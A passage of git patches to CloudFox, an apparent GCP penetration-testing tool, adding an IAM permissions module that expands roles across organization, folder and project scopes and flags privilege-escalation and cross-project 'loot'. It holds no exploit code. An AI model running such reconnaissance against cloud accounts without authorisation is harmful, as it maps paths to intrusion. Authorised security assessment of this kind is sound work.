ProjectNames map[string]string // ProjectID -> DisplayName mapping + Account string // Authenticated account email // Configuration Verbosity int @@ -62,12 +64,23 @@ type BaseGCPModule struct { CommandCounter internal.CommandCounter } +// GetProjectName returns the display name for a project ID, falling back to the ID if not found +func (b *BaseGCPModule) GetProjectName(projectID string) string { + if b.ProjectNames != nil { + if name, ok := b.ProjectNames[projectID]; ok { + return name + } + } + return projectID +} + // ------------------------------ // NewBaseGCPModule - Helper to create BaseGCPModule from CommandContext // ------------------------------ func NewBaseGCPModule(cmdCtx *CommandContext) BaseGCPModule { return BaseGCPModule{ ProjectIDs: cmdCtx.ProjectIDs, + ProjectNames: cmdCtx.ProjectNames, Account: cmdCtx.Account, Verbosity: cmdCtx.Verbosity, WrapTable: cmdCtx.WrapTable, @@ -200,6 +213,18 @@ func InitializeCommandContext(cmd *cobra.Command, moduleName string) (*CommandCo return nil, fmt.Errorf("no project IDs provided") } + // -------------------- Get project names from context -------------------- + var projectNames map[string]string + if value, ok := ctx.Value("projectNames").(map[string]string); ok { + projectNames = value + } else { + // Initialize empty map if not provided - modules can still work without names + projectNames = make(map[string]string) + for _, id := range projectIDs { + projectNames[id] = id // fallback to using ID as name + } + } + // -------------------- Get account from context -------------------- var account string if value, ok := ctx.Value("account").(string); ok { @@ -218,6 +243,7 @@ func InitializeCommandContext(cmd *cobra.Command, moduleName string) (*CommandCo Ctx: ctx, Logger: logger, ProjectIDs: projectIDs, + ProjectNames: projectNames, Account: account, Verbosity: verbosity, WrapTable: wrap, From eae16c32b40658e7f6c25705a93e297d857115cb Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Tue, 30 Dec 2025 13:54:10 -0500 Subject: [PATCH 05/48] updated permission module --- gcp/commands/permissions.go | 716 +++++++++++++++++++++++++++--------- 1 file changed, 552 insertions(+), 164 deletions(-) diff --git a/gcp/commands/permissions.go b/gcp/commands/permissions.go index e946061d..da5d6b5d 100644 --- a/gcp/commands/permissions.go +++ b/gcp/commands/permissions.go @@ -8,6 +8,7 @@ import ( "sync" IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" + orgsservice "github.com/BishopFox/cloudfox/gcp/services/organizationsService" privescservice "github.com/BishopFox/cloudfox/gcp/services/privescService" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" @@ -18,24 +19,35 @@ import ( var GCPPermissionsCommand = &cobra.Command{ Use: globals.GCP_PERMISSIONS_MODULE_NAME, Aliases: []string{"perms", "privs"}, - Short: "Enumerate all permissions for each IAM entity with detailed source information", - Long: `Enumerate all permissions for each IAM entity (user, service account, group, etc.) with detailed source information. - -Features: -- Lists every permission for each entity line by line -- Shows the role that granted each permission -- Identifies if permissions are inherited from folders/organization -- Shows conditional access restrictions on permissions -- Distinguishes between predefined, custom, and basic roles -- Summarizes total and unique permission counts per entity -- Identifies high-privilege permissions (iam.*, resourcemanager.*, etc.) -- Enumerates group memberships using Cloud Identity API (when accessible) -- Expands permissions to include inherited permissions from group membership -- Identifies nested groups (groups that are members of other groups) -- Generates loot files for exploitation and further analysis - -This is a comprehensive permission enumeration - expect longer execution times for projects with many entities. -Note: Group membership enumeration requires Cloud Identity API access (cloudidentity.groups.readonly scope).`, + Short: "Enumerate ALL permissions for each IAM entity with full inheritance explosion", + Long: `Enumerate ALL permissions for each IAM entity with complete inheritance explosion. + +This module provides COMPLETE permission visibility by: +- Enumerating organization-level IAM bindings (top of hierarchy) +- Enumerating folder-level IAM bindings (inherited to child resources) +- Enumerating project-level IAM bindings (resource-specific) +- EXPLODING every role into its individual permissions (one line per permission) +- Tracking the exact inheritance source for each permission +- Expanding group memberships to show inherited permissions +- Identifying cross-project access patterns +- Flagging dangerous/privesc permissions + +Output Tables: +1. permissions-exploded: ONE ROW PER PERMISSION with full context +2. permissions-summary: Entity summary with permission counts +3. permissions-by-scope: Permissions grouped by resource scope (org/folder/project) +4. permissions-dangerous: Privesc-relevant permissions +5. permissions-cross-project: Permissions granting cross-project access + +Each permission row includes: +- Entity (user/SA/group) +- Permission name +- Role that grants this permission +- Resource scope (organization/folder/project ID) +- Inheritance source (where the binding was defined) +- Condition (if any IAM conditions apply) + +This is a comprehensive enumeration - expect longer execution times for large organizations.`, Run: runGCPPermissionsCommand, } @@ -67,6 +79,27 @@ var highPrivilegePermissionPrefixes = []string{ "orgpolicy.policy.set", } +// ExplodedPermission represents a single permission entry with full context +type ExplodedPermission struct { + Entity string // Full entity identifier (e.g., user:foo@example.com) + EntityType string // User, ServiceAccount, Group, etc. + EntityEmail string // Clean email without prefix + Permission string // Individual permission name + Role string // Role that grants this permission + RoleType string // predefined, custom, basic + ResourceScope string // Full resource path (organizations/123, folders/456, projects/xyz) + ResourceScopeType string // organization, folder, project + ResourceScopeID string // Just the ID portion + InheritedFrom string // Where the binding was defined (if different from scope) + IsInherited bool // True if permission comes from a higher level + HasCondition bool // True if IAM condition applies + Condition string // Condition expression if any + EffectiveProject string // The project this permission is effective in + ProjectName string // Display name of the effective project + IsCrossProject bool // True if entity is from different project + SourceProject string // Entity's home project (for cross-project detection) +} + // ------------------------------ // Module Struct with embedded BaseGCPModule // ------------------------------ @@ -74,8 +107,11 @@ type PermissionsModule struct { gcpinternal.BaseGCPModule // Module-specific fields + ExplodedPerms []ExplodedPermission EntityPermissions []IAMService.EntityPermissions GroupInfos []IAMService.GroupInfo + OrgBindings []IAMService.PolicyBinding // Organization-level bindings + FolderBindings map[string][]IAMService.PolicyBinding // Folder ID -> bindings LootMap map[string]*internal.LootFile mu sync.Mutex } @@ -104,8 +140,11 @@ func runGCPPermissionsCommand(cmd *cobra.Command, args []string) { // Create module instance module := &PermissionsModule{ BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ExplodedPerms: []ExplodedPermission{}, EntityPermissions: []IAMService.EntityPermissions{}, GroupInfos: []IAMService.GroupInfo{}, + OrgBindings: []IAMService.PolicyBinding{}, + FolderBindings: make(map[string][]IAMService.PolicyBinding), LootMap: make(map[string]*internal.LootFile), } @@ -120,40 +159,60 @@ func runGCPPermissionsCommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *PermissionsModule) Execute(ctx context.Context, logger internal.Logger) { - logger.InfoM("Enumerating permissions for all entities with group expansion (this may take a while)...", globals.GCP_PERMISSIONS_MODULE_NAME) + logger.InfoM("Enumerating ALL permissions with full inheritance explosion...", globals.GCP_PERMISSIONS_MODULE_NAME) + logger.InfoM("This includes organization, folder, and project-level bindings", globals.GCP_PERMISSIONS_MODULE_NAME) + + // First, try to enumerate organization-level bindings + m.enumerateOrganizationBindings(ctx, logger) - // Run enumeration with concurrency + // Run project enumeration with concurrency m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_PERMISSIONS_MODULE_NAME, m.processProject) // Check results - if len(m.EntityPermissions) == 0 { - logger.InfoM("No entity permissions found", globals.GCP_PERMISSIONS_MODULE_NAME) + if len(m.ExplodedPerms) == 0 { + logger.InfoM("No permissions found", globals.GCP_PERMISSIONS_MODULE_NAME) return } - // Count total permissions and group membership stats - totalPerms := 0 - groupsEnumerated := 0 - for _, ep := range m.EntityPermissions { - totalPerms += ep.TotalPerms - } - for _, gi := range m.GroupInfos { - if gi.MembershipEnumerated { - groupsEnumerated++ + // Count statistics + uniqueEntities := make(map[string]bool) + uniquePerms := make(map[string]bool) + inheritedCount := 0 + crossProjectCount := 0 + dangerousCount := 0 + + for _, ep := range m.ExplodedPerms { + uniqueEntities[ep.Entity] = true + uniquePerms[ep.Permission] = true + if ep.IsInherited { + inheritedCount++ + } + if ep.IsCrossProject { + crossProjectCount++ + } + if getDangerousPermissionInfo(ep.Permission) != nil { + dangerousCount++ } } - logger.SuccessM(fmt.Sprintf("Found %d entity(ies) with %d total permission entries", - len(m.EntityPermissions), totalPerms), globals.GCP_PERMISSIONS_MODULE_NAME) + logger.SuccessM(fmt.Sprintf("Exploded %d total permission entries for %d entities", + len(m.ExplodedPerms), len(uniqueEntities)), globals.GCP_PERMISSIONS_MODULE_NAME) + logger.InfoM(fmt.Sprintf("Unique permissions: %d | Inherited: %d | Cross-project: %d | Dangerous: %d", + len(uniquePerms), inheritedCount, crossProjectCount, dangerousCount), globals.GCP_PERMISSIONS_MODULE_NAME) if len(m.GroupInfos) > 0 { + groupsEnumerated := 0 + for _, gi := range m.GroupInfos { + if gi.MembershipEnumerated { + groupsEnumerated++ + } + } logger.InfoM(fmt.Sprintf("Found %d group(s), enumerated membership for %d", len(m.GroupInfos), groupsEnumerated), globals.GCP_PERMISSIONS_MODULE_NAME) // Warn about blindspot if we couldn't enumerate some groups unenumeratedGroups := len(m.GroupInfos) - groupsEnumerated if unenumeratedGroups > 0 { logger.InfoM(fmt.Sprintf("[WARNING] Could not enumerate membership for %d group(s) - permissions inherited via these groups are NOT visible!", unenumeratedGroups), globals.GCP_PERMISSIONS_MODULE_NAME) - logger.InfoM("[WARNING] Group members may have elevated privileges not shown in this output. Consider enabling Cloud Identity API access.", globals.GCP_PERMISSIONS_MODULE_NAME) } } @@ -161,6 +220,53 @@ func (m *PermissionsModule) Execute(ctx context.Context, logger internal.Logger) m.writeOutput(ctx, logger) } +// enumerateOrganizationBindings tries to get organization-level IAM bindings +func (m *PermissionsModule) enumerateOrganizationBindings(ctx context.Context, logger internal.Logger) { + // Try to discover the organization + orgsSvc := orgsservice.New() + + // Use SearchProjects to find organizations from project ancestry + if len(m.ProjectIDs) > 0 { + iamSvc := IAMService.New() + + // Try to get org bindings via the first project's ancestry + bindings, err := iamSvc.PoliciesWithInheritance(m.ProjectIDs[0]) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Could not get inherited policies: %v", err), globals.GCP_PERMISSIONS_MODULE_NAME) + } + return + } + + // Extract org and folder bindings + for _, binding := range bindings { + if binding.ResourceType == "organization" { + m.mu.Lock() + m.OrgBindings = append(m.OrgBindings, binding) + m.mu.Unlock() + } else if binding.ResourceType == "folder" { + m.mu.Lock() + m.FolderBindings[binding.ResourceID] = append(m.FolderBindings[binding.ResourceID], binding) + m.mu.Unlock() + } + } + + if len(m.OrgBindings) > 0 { + logger.InfoM(fmt.Sprintf("Found %d organization-level IAM binding(s)", len(m.OrgBindings)), globals.GCP_PERMISSIONS_MODULE_NAME) + } + + totalFolderBindings := 0 + for _, bindings := range m.FolderBindings { + totalFolderBindings += len(bindings) + } + if totalFolderBindings > 0 { + logger.InfoM(fmt.Sprintf("Found %d folder-level IAM binding(s) across %d folder(s)", totalFolderBindings, len(m.FolderBindings)), globals.GCP_PERMISSIONS_MODULE_NAME) + } + } + + _ = orgsSvc // silence unused warning if not used +} + // ------------------------------ // Project Processor (called concurrently for each project) // ------------------------------ @@ -180,8 +286,51 @@ func (m *PermissionsModule) processProject(ctx context.Context, projectID string return } + // Explode permissions - create one entry per permission + var explodedPerms []ExplodedPermission + for _, ep := range entityPerms { + for _, perm := range ep.Permissions { + exploded := ExplodedPermission{ + Entity: ep.Entity, + EntityType: ep.EntityType, + EntityEmail: ep.Email, + Permission: perm.Permission, + Role: perm.Role, + RoleType: perm.RoleType, + ResourceScope: fmt.Sprintf("%s/%s", perm.ResourceType, perm.ResourceID), + ResourceScopeType: perm.ResourceType, + ResourceScopeID: perm.ResourceID, + IsInherited: perm.IsInherited, + InheritedFrom: perm.InheritedFrom, + HasCondition: perm.HasCondition, + Condition: perm.Condition, + EffectiveProject: projectID, + ProjectName: m.GetProjectName(projectID), + } + + // Detect cross-project access + if ep.EntityType == "ServiceAccount" { + // Extract project from SA email (format: sa-name@project-id.iam.gserviceaccount.com) + parts := strings.Split(ep.Email, "@") + if len(parts) == 2 { + saParts := strings.Split(parts[1], ".") + if len(saParts) >= 1 { + saProject := saParts[0] + if saProject != projectID { + exploded.IsCrossProject = true + exploded.SourceProject = saProject + } + } + } + } + + explodedPerms = append(explodedPerms, exploded) + } + } + // Thread-safe append m.mu.Lock() + m.ExplodedPerms = append(m.ExplodedPerms, explodedPerms...) m.EntityPermissions = append(m.EntityPermissions, entityPerms...) m.GroupInfos = append(m.GroupInfos, groupInfos...) @@ -197,7 +346,7 @@ func (m *PermissionsModule) processProject(ctx context.Context, projectID string m.mu.Unlock() if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Found %d entity(ies) with permissions in project %s", len(entityPerms), projectID), globals.GCP_PERMISSIONS_MODULE_NAME) + logger.InfoM(fmt.Sprintf("Exploded %d permission entries in project %s", len(explodedPerms), projectID), globals.GCP_PERMISSIONS_MODULE_NAME) } } @@ -207,7 +356,7 @@ func (m *PermissionsModule) processProject(ctx context.Context, projectID string func (m *PermissionsModule) initializeLootFiles() { m.LootMap["permissions-all"] = &internal.LootFile{ Name: "permissions-all", - Contents: "# GCP Entity Permissions (All)\n# Generated by CloudFox\n# Format: Entity | Permission | Role | Inherited | Condition\n\n", + Contents: "# GCP Entity Permissions (All)\n# Generated by CloudFox\n# Format: Entity | Permission | Role | Scope | Inherited | Condition\n\n", } m.LootMap["permissions-high-privilege"] = &internal.LootFile{ Name: "permissions-high-privilege", @@ -242,6 +391,14 @@ func (m *PermissionsModule) initializeLootFiles() { Name: "permissions-dangerous-by-category", Contents: "# GCP Dangerous Permissions by Category\n# Generated by CloudFox\n\n", } + m.LootMap["permissions-cross-project"] = &internal.LootFile{ + Name: "permissions-cross-project", + Contents: "# GCP Cross-Project Permissions\n# Generated by CloudFox\n# Service accounts with access to projects outside their home project\n\n", + } + m.LootMap["permissions-org-level"] = &internal.LootFile{ + Name: "permissions-org-level", + Contents: "# GCP Organization-Level Permissions\n# Generated by CloudFox\n# These permissions are inherited by ALL projects in the organization\n\n", + } } func (m *PermissionsModule) addEntityToLoot(ep IAMService.EntityPermissions) { @@ -281,8 +438,8 @@ func (m *PermissionsModule) addEntityToLoot(ep IAMService.EntityPermissions) { // All permissions m.LootMap["permissions-all"].Contents += fmt.Sprintf( - "%s | %s | %s | %v | %s\n", - ep.Email, perm.Permission, perm.Role, perm.IsInherited, perm.Condition, + "%s | %s | %s | %s/%s | %v | %s\n", + ep.Email, perm.Permission, perm.Role, perm.ResourceType, perm.ResourceID, perm.IsInherited, perm.Condition, ) // High privilege permissions @@ -339,6 +496,14 @@ func (m *PermissionsModule) addEntityToLoot(ep IAMService.EntityPermissions) { ep.Email, perm.Permission, perm.Role, perm.Condition, ) } + + // Organization-level permissions + if perm.ResourceType == "organization" { + m.LootMap["permissions-org-level"].Contents += fmt.Sprintf( + "%s | %s | %s | %s\n", + ep.Email, perm.Permission, perm.Role, perm.ResourceID, + ) + } } m.LootMap["permissions-by-entity"].Contents += "\n" } @@ -438,176 +603,335 @@ func getDangerousPermissionInfo(permission string) *DangerousPermissionInfo { // Output Generation // ------------------------------ func (m *PermissionsModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Entity summary table + // ======================================== + // TABLE 1: EXPLODED PERMISSIONS (Main table - one row per permission) + // ======================================== + explodedHeader := []string{ + "Entity", + "Type", + "Permission", + "Role", + "Role Type", + "Resource Scope", + "Scope Type", + "Scope ID", + "Inherited", + "Inherited From", + "Condition", + "Effective Project", + "Project Name", + "Cross-Project", + } + + var explodedBody [][]string + for _, ep := range m.ExplodedPerms { + inherited := "" + if ep.IsInherited { + inherited = "✓" + } + crossProject := "" + if ep.IsCrossProject { + crossProject = fmt.Sprintf("✓ (from %s)", ep.SourceProject) + } + condition := "" + if ep.HasCondition { + condition = ep.Condition + } + + explodedBody = append(explodedBody, []string{ + ep.EntityEmail, + ep.EntityType, + ep.Permission, + ep.Role, + ep.RoleType, + ep.ResourceScope, + ep.ResourceScopeType, + ep.ResourceScopeID, + inherited, + ep.InheritedFrom, + condition, + ep.EffectiveProject, + ep.ProjectName, + crossProject, + }) + } + + // Sort by entity, then by permission for consistent output + sort.Slice(explodedBody, func(i, j int) bool { + if explodedBody[i][0] != explodedBody[j][0] { + return explodedBody[i][0] < explodedBody[j][0] + } + return explodedBody[i][2] < explodedBody[j][2] + }) + + // ======================================== + // TABLE 2: Entity summary table + // ======================================== summaryHeader := []string{ "Entity", "Type", - "Roles", "Total Perms", "Unique Perms", + "Roles", "High Priv", + "Dangerous", "Inherited", "Conditional", - "Project Name", - "Project ID", + "Projects", + "Cross-Project", } - var summaryBody [][]string - highPrivEntities := 0 - for _, ep := range m.EntityPermissions { - highPrivCount := 0 - inheritedCount := 0 - conditionalCount := 0 - for _, perm := range ep.Permissions { - if isHighPrivilegePermission(perm.Permission) { - highPrivCount++ - } - if perm.IsInherited { - inheritedCount++ - } - if perm.HasCondition { - conditionalCount++ + // Aggregate by entity + entityStats := make(map[string]*struct { + entityType string + totalPerms int + uniquePerms map[string]bool + roles map[string]bool + highPriv int + dangerous int + inherited int + conditional int + projects map[string]bool + crossProject int + }) + + for _, ep := range m.ExplodedPerms { + if entityStats[ep.Entity] == nil { + entityStats[ep.Entity] = &struct { + entityType string + totalPerms int + uniquePerms map[string]bool + roles map[string]bool + highPriv int + dangerous int + inherited int + conditional int + projects map[string]bool + crossProject int + }{ + entityType: ep.EntityType, + uniquePerms: make(map[string]bool), + roles: make(map[string]bool), + projects: make(map[string]bool), } } - - if highPrivCount > 0 { - highPrivEntities++ + stats := entityStats[ep.Entity] + stats.totalPerms++ + stats.uniquePerms[ep.Permission] = true + stats.roles[ep.Role] = true + stats.projects[ep.EffectiveProject] = true + if isHighPrivilegePermission(ep.Permission) { + stats.highPriv++ + } + if getDangerousPermissionInfo(ep.Permission) != nil { + stats.dangerous++ + } + if ep.IsInherited { + stats.inherited++ } + if ep.HasCondition { + stats.conditional++ + } + if ep.IsCrossProject { + stats.crossProject++ + } + } + var summaryBody [][]string + for entity, stats := range entityStats { + crossProjectStr := "" + if stats.crossProject > 0 { + crossProjectStr = fmt.Sprintf("✓ (%d)", stats.crossProject) + } summaryBody = append(summaryBody, []string{ - ep.Email, + extractEmailFromEntity(entity), + stats.entityType, + fmt.Sprintf("%d", stats.totalPerms), + fmt.Sprintf("%d", len(stats.uniquePerms)), + fmt.Sprintf("%d", len(stats.roles)), + fmt.Sprintf("%d", stats.highPriv), + fmt.Sprintf("%d", stats.dangerous), + fmt.Sprintf("%d", stats.inherited), + fmt.Sprintf("%d", stats.conditional), + fmt.Sprintf("%d", len(stats.projects)), + crossProjectStr, + }) + } + + // Sort by dangerous count descending + sort.Slice(summaryBody, func(i, j int) bool { + di := 0 + dj := 0 + fmt.Sscanf(summaryBody[i][6], "%d", &di) + fmt.Sscanf(summaryBody[j][6], "%d", &dj) + return di > dj + }) + + // ======================================== + // TABLE 3: Permissions by Scope (org/folder/project) + // ======================================== + scopeHeader := []string{ + "Scope Type", + "Scope ID", + "Entity", + "Type", + "Permission", + "Role", + "Inherited From", + "Condition", + } + + var scopeBody [][]string + for _, ep := range m.ExplodedPerms { + scopeBody = append(scopeBody, []string{ + ep.ResourceScopeType, + ep.ResourceScopeID, + ep.EntityEmail, ep.EntityType, - fmt.Sprintf("%d", len(ep.Roles)), - fmt.Sprintf("%d", ep.TotalPerms), - fmt.Sprintf("%d", ep.UniquePerms), - fmt.Sprintf("%d", highPrivCount), - fmt.Sprintf("%d", inheritedCount), - fmt.Sprintf("%d", conditionalCount), - m.GetProjectName(ep.ProjectID), - ep.ProjectID, + ep.Permission, + ep.Role, + ep.InheritedFrom, + ep.Condition, }) } - // Detailed permissions table (one row per permission) - detailHeader := []string{ + // Sort by scope type (org first, then folder, then project), then scope ID + scopeOrder := map[string]int{"organization": 0, "folder": 1, "project": 2} + sort.Slice(scopeBody, func(i, j int) bool { + if scopeBody[i][0] != scopeBody[j][0] { + return scopeOrder[scopeBody[i][0]] < scopeOrder[scopeBody[j][0]] + } + return scopeBody[i][1] < scopeBody[j][1] + }) + + // ======================================== + // TABLE 4: Dangerous permissions table + // ======================================== + dangerousHeader := []string{ + "Risk", + "Category", "Entity", "Type", "Permission", + "Description", "Role", - "Role Type", + "Scope", "Inherited", - "Source", - "Condition", + "Effective Project", "Project Name", - "Project ID", } - var detailBody [][]string - for _, ep := range m.EntityPermissions { - for _, perm := range ep.Permissions { + var dangerousBody [][]string + criticalCount := 0 + for _, ep := range m.ExplodedPerms { + if dpInfo := getDangerousPermissionInfo(ep.Permission); dpInfo != nil { inherited := "" - source := perm.ResourceType - if perm.IsInherited { - inherited = "✓" - source = perm.InheritedFrom + if ep.IsInherited { + inherited = ep.InheritedFrom } - - condition := "" - if perm.HasCondition { - condition = perm.Condition - } - - detailBody = append(detailBody, []string{ - ep.Email, + dangerousBody = append(dangerousBody, []string{ + dpInfo.RiskLevel, + dpInfo.Category, + ep.EntityEmail, ep.EntityType, - perm.Permission, - perm.Role, - perm.RoleType, + dpInfo.Permission, + dpInfo.Description, + ep.Role, + ep.ResourceScope, inherited, - source, - condition, - m.GetProjectName(perm.ResourceID), - perm.ResourceID, + ep.EffectiveProject, + ep.ProjectName, }) + if dpInfo.RiskLevel == "CRITICAL" { + criticalCount++ + } } } - // High privilege permissions table - highPrivHeader := []string{ + // Sort by risk level + riskOrder := map[string]int{"CRITICAL": 0, "HIGH": 1, "MEDIUM": 2, "LOW": 3, "INFO": 4} + sort.Slice(dangerousBody, func(i, j int) bool { + return riskOrder[dangerousBody[i][0]] < riskOrder[dangerousBody[j][0]] + }) + + // ======================================== + // TABLE 5: Cross-project permissions + // ======================================== + crossProjectHeader := []string{ "Entity", "Type", + "Source Project", + "Target Project", + "Target Project Name", "Permission", "Role", "Inherited", - "Condition", - "Project Name", - "Project ID", } - var highPrivBody [][]string - for _, ep := range m.EntityPermissions { - for _, perm := range ep.Permissions { - if isHighPrivilegePermission(perm.Permission) { - inherited := "" - if perm.IsInherited { - inherited = perm.InheritedFrom - } - condition := "" - if perm.HasCondition { - condition = perm.Condition - } - - highPrivBody = append(highPrivBody, []string{ - ep.Email, - ep.EntityType, - perm.Permission, - perm.Role, - inherited, - condition, - m.GetProjectName(perm.ResourceID), - perm.ResourceID, - }) + var crossProjectBody [][]string + for _, ep := range m.ExplodedPerms { + if ep.IsCrossProject { + inherited := "" + if ep.IsInherited { + inherited = ep.InheritedFrom } + crossProjectBody = append(crossProjectBody, []string{ + ep.EntityEmail, + ep.EntityType, + ep.SourceProject, + ep.EffectiveProject, + ep.ProjectName, + ep.Permission, + ep.Role, + inherited, + }) } } - // Dangerous permissions table with categories (pentest-focused) - dangerousHeader := []string{ - "Risk", - "Category", + // ======================================== + // TABLE 6: High privilege permissions table + // ======================================== + highPrivHeader := []string{ "Entity", "Type", "Permission", - "Description", "Role", + "Scope", + "Inherited", + "Condition", + "Effective Project", "Project Name", - "Project ID", } - var dangerousBody [][]string - criticalCount := 0 - for _, ep := range m.EntityPermissions { - for _, perm := range ep.Permissions { - if dpInfo := getDangerousPermissionInfo(perm.Permission); dpInfo != nil { - dangerousBody = append(dangerousBody, []string{ - dpInfo.RiskLevel, - dpInfo.Category, - ep.Email, - ep.EntityType, - dpInfo.Permission, - dpInfo.Description, - perm.Role, - m.GetProjectName(perm.ResourceID), - perm.ResourceID, - }) - if dpInfo.RiskLevel == "CRITICAL" { - criticalCount++ - } + var highPrivBody [][]string + for _, ep := range m.ExplodedPerms { + if isHighPrivilegePermission(ep.Permission) { + inherited := "" + if ep.IsInherited { + inherited = ep.InheritedFrom } + condition := "" + if ep.HasCondition { + condition = ep.Condition + } + + highPrivBody = append(highPrivBody, []string{ + ep.EntityEmail, + ep.EntityType, + ep.Permission, + ep.Role, + ep.ResourceScope, + inherited, + condition, + ep.EffectiveProject, + ep.ProjectName, + }) } } - // Group membership table + // ======================================== + // TABLE 7: Group membership table + // ======================================== groupHeader := []string{ "Group Email", "Display Name", @@ -642,7 +966,9 @@ func (m *PermissionsModule) writeOutput(ctx context.Context, logger internal.Log }) } - // Group members detail table + // ======================================== + // TABLE 8: Group members detail table + // ======================================== groupMembersHeader := []string{ "Group Email", "Member Email", @@ -668,6 +994,36 @@ func (m *PermissionsModule) writeOutput(ctx context.Context, logger internal.Log } } + // ======================================== + // TABLE 9: Inherited permissions table + // ======================================== + inheritedHeader := []string{ + "Entity", + "Type", + "Permission", + "Role", + "Inherited From", + "Scope Type", + "Effective Project", + "Project Name", + } + + var inheritedBody [][]string + for _, ep := range m.ExplodedPerms { + if ep.IsInherited { + inheritedBody = append(inheritedBody, []string{ + ep.EntityEmail, + ep.EntityType, + ep.Permission, + ep.Role, + ep.InheritedFrom, + ep.ResourceScopeType, + ep.EffectiveProject, + ep.ProjectName, + }) + } + } + // Collect loot files var lootFiles []internal.LootFile for _, loot := range m.LootMap { @@ -678,6 +1034,11 @@ func (m *PermissionsModule) writeOutput(ctx context.Context, logger internal.Log // Build tables tables := []internal.TableFile{ + { + Name: "permissions-exploded", + Header: explodedHeader, + Body: explodedBody, + }, { Name: "permissions-summary", Header: summaryHeader, @@ -685,14 +1046,13 @@ func (m *PermissionsModule) writeOutput(ctx context.Context, logger internal.Log }, } - // Add high privilege table if there are any - if len(highPrivBody) > 0 { + // Add scope table + if len(scopeBody) > 0 { tables = append(tables, internal.TableFile{ - Name: "permissions-high-privilege", - Header: highPrivHeader, - Body: highPrivBody, + Name: "permissions-by-scope", + Header: scopeHeader, + Body: scopeBody, }) - logger.InfoM(fmt.Sprintf("[FINDING] Found %d entity(ies) with high-privilege permissions!", highPrivEntities), globals.GCP_PERMISSIONS_MODULE_NAME) } // Add dangerous permissions table (pentest-focused) @@ -702,15 +1062,34 @@ func (m *PermissionsModule) writeOutput(ctx context.Context, logger internal.Log Header: dangerousHeader, Body: dangerousBody, }) - logger.InfoM(fmt.Sprintf("[PENTEST] Found %d dangerous permission(s) (%d CRITICAL) - privesc risk!", len(dangerousBody), criticalCount), globals.GCP_PERMISSIONS_MODULE_NAME) + logger.InfoM(fmt.Sprintf("[PENTEST] Found %d dangerous permission entries (%d CRITICAL) - privesc risk!", len(dangerousBody), criticalCount), globals.GCP_PERMISSIONS_MODULE_NAME) + } + + // Add cross-project table + if len(crossProjectBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "permissions-cross-project", + Header: crossProjectHeader, + Body: crossProjectBody, + }) + logger.InfoM(fmt.Sprintf("[FINDING] Found %d cross-project permission entries!", len(crossProjectBody)), globals.GCP_PERMISSIONS_MODULE_NAME) } - // Add detailed table (can be large) - if len(detailBody) > 0 { + // Add high privilege table if there are any + if len(highPrivBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "permissions-high-privilege", + Header: highPrivHeader, + Body: highPrivBody, + }) + } + + // Add inherited permissions table + if len(inheritedBody) > 0 { tables = append(tables, internal.TableFile{ - Name: "permissions-detail", - Header: detailHeader, - Body: detailBody, + Name: "permissions-inherited", + Header: inheritedHeader, + Body: inheritedBody, }) } @@ -761,3 +1140,12 @@ func (m *PermissionsModule) writeOutput(ctx context.Context, logger internal.Log m.CommandCounter.Error++ } } + +// extractEmailFromEntity extracts the email portion from an entity string like "user:foo@example.com" +func extractEmailFromEntity(entity string) string { + parts := strings.SplitN(entity, ":", 2) + if len(parts) == 2 { + return parts[1] + } + return entity +} From ec9a50ead1f24aeb656993cf7ae60fe8f2ac4dca Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Sun, 4 Jan 2026 09:46:15 -0500 Subject: [PATCH 06/48] fixed error handling --- gcp/commands/accesslevels.go | 70 ++++- gcp/commands/apikeys.go | 5 +- gcp/commands/appengine.go | 28 +- gcp/commands/artifact-registry.go | 5 +- gcp/commands/assetinventory.go | 18 +- gcp/commands/backupinventory.go | 24 +- gcp/commands/bigquery.go | 5 +- gcp/commands/bigtable.go | 6 +- gcp/commands/bucketenum.go | 11 +- gcp/commands/buckets.go | 5 +- gcp/commands/certmanager.go | 18 +- gcp/commands/cloudarmor.go | 12 +- gcp/commands/cloudbuild.go | 12 +- gcp/commands/cloudrun.go | 10 +- gcp/commands/cloudsql.go | 5 +- gcp/commands/compliancedashboard.go | 13 +- gcp/commands/composer.go | 6 +- gcp/commands/containersecurity.go | 6 +- gcp/commands/costsecurity.go | 30 +- gcp/commands/crossproject.go | 18 +- gcp/commands/customroles.go | 6 +- gcp/commands/dataexfiltration.go | 30 +- gcp/commands/dataflow.go | 6 +- gcp/commands/dataproc.go | 6 +- gcp/commands/dns.go | 11 +- gcp/commands/domainwidedelegation.go | 12 +- gcp/commands/endpoints.go | 5 +- gcp/commands/filestore.go | 6 +- gcp/commands/firewall.go | 15 +- gcp/commands/functions.go | 5 +- gcp/commands/gke.go | 5 +- gcp/commands/hmackeys.go | 5 +- gcp/commands/iam.go | 5 +- gcp/commands/iap.go | 6 +- gcp/commands/identityprotection.go | 12 +- gcp/commands/instances.go | 5 +- gcp/commands/kms.go | 10 +- gcp/commands/lateralmovement.go | 12 +- gcp/commands/loadbalancers.go | 6 +- gcp/commands/logging.go | 10 +- gcp/commands/logginggaps.go | 6 +- gcp/commands/memorystore.go | 6 +- gcp/commands/monitoringalerts.go | 18 +- gcp/commands/networkendpoints.go | 18 +- gcp/commands/networkexposure.go | 36 ++- gcp/commands/networktopology.go | 30 +- gcp/commands/notebooks.go | 6 +- gcp/commands/orgpolicies.go | 5 +- gcp/commands/permissions.go | 5 +- gcp/commands/privesc.go | 5 +- gcp/commands/publicresources.go | 6 +- gcp/commands/pubsub.go | 10 +- gcp/commands/resourcegraph.go | 6 +- gcp/commands/scheduler.go | 5 +- gcp/commands/secrets.go | 5 +- gcp/commands/securitycenter.go | 6 +- gcp/commands/serviceaccounts.go | 5 +- gcp/commands/sourcerepos.go | 6 +- gcp/commands/spanner.go | 6 +- gcp/commands/vpcnetworks.go | 6 +- gcp/commands/vpcsc.go | 18 +- gcp/commands/whoami.go | 283 ++++++++++++++---- 